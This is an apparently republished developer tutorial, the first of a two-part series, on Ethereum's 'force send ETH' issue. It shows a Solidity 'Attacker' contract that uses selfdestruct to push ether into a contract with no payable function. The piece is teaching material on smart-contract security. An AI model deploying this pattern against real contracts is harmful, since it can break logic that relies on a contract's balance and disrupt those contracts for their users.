Your Web News in One Place

Help Webnuz

Referal links:

Sign up for GreenGeeks web hosting
May 14, 2022 08:18 pm GMT

Force Send ETH - 1

This vulnerability is due to a famous solidity functionality:

selfdestruct(payable(addressThat)), this is used to send all the ETH present in a contract to another contract at addressThat. selfdestruct is operation at EVM level which clears all data from the contract and frees up space on the blockchain.

It is also quite cheaper than addressThat.send(this.balance) to send all eth to some other contract.

Let's see this with an example:

contract dontWant { // no payable function, hence can't recieve eth    function something() external pure returns(uint) {        return 1;    }    function getBalance() external view returns(uint) {        return address(this).balance;    }}

Attacker:

contract Attacker {    receive() external payable { // we will send ether to this contract    }    function attack(address _dontWant) payable external { // this contract will forecfully send all ether to dontWant        selfdestruct(payable(_dontWant));    }    function getBalance() external view returns(uint) {        return address(this).balance;    }}

When we send some ETH to Attacker contract and call attack() function, dontWant recieves ETH.

Any contract can send ETH to any other contract (even if receiver contract has no receive/fallback function) using selfdestruct.
But why is this a vulnerability in the first place? What's wrong in recieving free ETH?
You will get answers these in the next post (Force Send ETH - 2)


Original Link: https://dev.to/rushanksavant/force-send-eth-1-2on1

Share this article:    Share on Facebook
View Full Article

Dev To

An online community for sharing and discovering great ideas, having debates, and making friends

More About this Source Visit Dev To